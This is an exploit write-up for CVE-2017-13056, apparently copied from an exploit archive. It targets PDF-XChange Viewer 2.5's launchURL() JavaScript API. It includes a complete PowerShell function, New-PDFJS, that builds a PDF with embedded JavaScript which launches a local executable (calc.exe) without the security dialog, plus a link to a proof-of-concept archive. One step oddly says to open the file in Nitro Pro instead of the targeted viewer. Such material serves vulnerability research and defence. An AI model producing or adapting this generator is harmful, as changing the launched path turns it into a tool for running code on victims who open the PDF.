PDF-XChange Viewer 2.5 Build 314.0 Exploit, Code Execution

# Exploit Title: PDF-XChange Viewer 2.5 (Build 314.0) Javascript API Remote Code Execution Exploit (Powershell PDF Exploit Creation)
# Date: 21-08-2017
# Software Link 32bit: http://pdf-xchange-viewer.it.uptodown.com/windows
# Exploit Author: Daniele Votta
# Contact: vottadaniele@gmail.com
# Website: https://www.linkedin.com/in/vottadaniele/
# CVE: 2017-13056

# Category: PDF Reader RCE
 
1. Description

This module exploits an unsafe Javascript API implemented in PDF-XChange Viewer.
The launchURL() function allows an attacker to execute local files on the file
system and bypass the security dialog.

2. Proof of Concept (Generate evil PDF that start calc.exe) 
Step 1: Customize New-PDFjs.ps1 (custom params + PdfSharp-WPF.dll path)
Step 2: Execute Windows PowerShell: PS C:\Users\User> New-PDFJS
Step 3: Open the generated PDF with Nitro Pro PDF Reader
 
3. PDF Generation:

function New-PDFJS {

    

    # Use the desidered params

     [CmdletBinding()]
  
    Param (
        
    	[string]$js ="app.launchURL('C:\\Windows\\System32\\calc.exe')",
   
	[string]$msg = "Hello PDF",
 
        [string]$filename = "C:\Users\User\Desktop\calc.pdf"
  
    )

    

    # Use the PDFSharp-WPF.dll library path

    Add-Type -Path C:\Users\Daniele\Desktop\PdfSharp-WPF.dll

    $doc = New-Object PdfSharp.Pdf.PdfDocument
    $doc.Info.Title = $msg
    $doc.info.Creator = "AnonymousUser"
    $page = $doc.AddPage()

    $graphic = [PdfSharp.Drawing.XGraphics]::FromPdfPage($page)
    $font = New-Object PdfSharp.Drawing.XFont("Courier New", 20, [PdfSharp.Drawing.XFontStyle]::Bold)
    $box  = New-Object PdfSharp.Drawing.XRect(0,0,$page.Width, 100)
    $graphic.DrawString($msg, $font, [PdfSharp.Drawing.XBrushes]::Black, $box, [PdfSharp.Drawing.XStringFormats]::Center)

    $dictjs = New-Object PdfSharp.Pdf.PdfDictionary
    $dictjs.Elements["/S"]  = New-Object PdfSharp.Pdf.PdfName ("/JavaScript")
    $dictjs.Elements["/JS"] = New-Object PdfSharp.Pdf.PdfStringObject($doc, $js);
   
    $doc.Internals.AddObject($dictjs)

    $dict = New-Object PdfSharp.Pdf.PdfDictionary
    $pdfarray = New-Object PdfSharp.Pdf.PdfArray
    $embeddedstring = New-Object PdfSharp.Pdf.PdfString("EmbeddedJS")

    $dict.Elements["/Names"] = $pdfarray
    $pdfarray.Elements.Add($embeddedstring)
    $pdfarray.Elements.Add($dictjs.Reference)
    $doc.Internals.AddObject($dict)

    $dictgroup = New-Object PdfSharp.Pdf.PdfDictionary
    $dictgroup.Elements["/JavaScript"] = $dict.Reference
    $doc.Internals.Catalog.Elements["/Names"] = $dictgroup

    $doc.Save($filename)
}

Proof of Concept:
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42537.zip

Credits and Partners

All rights reserved nPulse.net 2009 - 2024
Powered by: MVCP 2.0-RC / BVCP / ASPF-MILTER / PHP 7.4 / NGINX / FreeBSD